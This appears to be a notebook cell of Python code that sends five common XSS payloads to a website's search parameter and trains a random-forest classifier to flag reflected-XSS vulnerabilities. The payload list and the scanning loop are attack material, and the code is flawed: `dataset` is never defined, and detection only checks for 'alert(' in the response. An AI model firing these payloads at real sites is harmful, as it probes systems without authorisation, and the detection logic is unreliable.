In [ ]:
import requests
from bs4 import BeautifulSoup
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
import joblib

# Generate various XSS payloads
def generate_xss_payloads():
    payloads = [
        "<script>alert('XSS');</script>",
        "<img src='x' onerror='alert(1)'>",
        "<a href='javascript:alert(1)'>Click me</a>",
        "<body onload=alert('XSS')>",
        "<input type='text' value='<script>alert(1)</script>'>"
    ]
    return payloads

# Send request with XSS payload and parse response
def send_xss_request(url, payload):
    response = requests.get(url, params={"search": payload})
    return response.text

# Function to extract features from response (e.g., presence of alert)
def extract_xss_features(response):
    if 'alert(' in response:
        return [1]  # 1 indicates successful XSS execution
    return [0]  # 0 indicates no XSS execution

# Function to train machine learning model to detect XSS vulnerabilities
def train_xss_model(dataset):
    X = dataset.drop('label', axis=1)  # Features
    y = dataset['label']  # 1 for vulnerable, 0 for not vulnerable

    # Feature scaling
    scaler = StandardScaler()
    X_scaled = scaler.fit_transform(X)

    # Split dataset
    X_train, X_test, y_train, y_test = train_test_split(X_scaled, y, test_size=0.2, random_state=42)

    # Random Forest model
    clf = RandomForestClassifier(n_estimators=100, random_state=42)
    clf.fit(X_train, y_train)

    # Save model and scaler
    joblib.dump(clf, 'xss_model.pkl')
    joblib.dump(scaler, 'xss_scaler.pkl')

    return clf, scaler

# Function to test web application for XSS vulnerabilities
def test_xss_vulnerability(url, clf, scaler):
    payloads = generate_xss_payloads()
    results = []

    for payload in payloads:
        response = send_xss_request(url, payload)
        features = extract_xss_features(response)
        features_scaled = scaler.transform([features])

        # Predict vulnerability using AI model
        prediction = clf.predict(features_scaled)
        results.append((payload, prediction))

    return results

# Example: Testing a website for XSS vulnerabilities
url = "http://example.com/search"
clf, scaler = train_xss_model(dataset)  # `dataset` is assumed to be a pre-labeled dataset
results = test_xss_vulnerability(url, clf, scaler)

for payload, prediction in results:
    if prediction == 1:
        print(f"Vulnerable to XSS with payload: {payload}")
    else:
        print(f"Not vulnerable with payload: {payload}")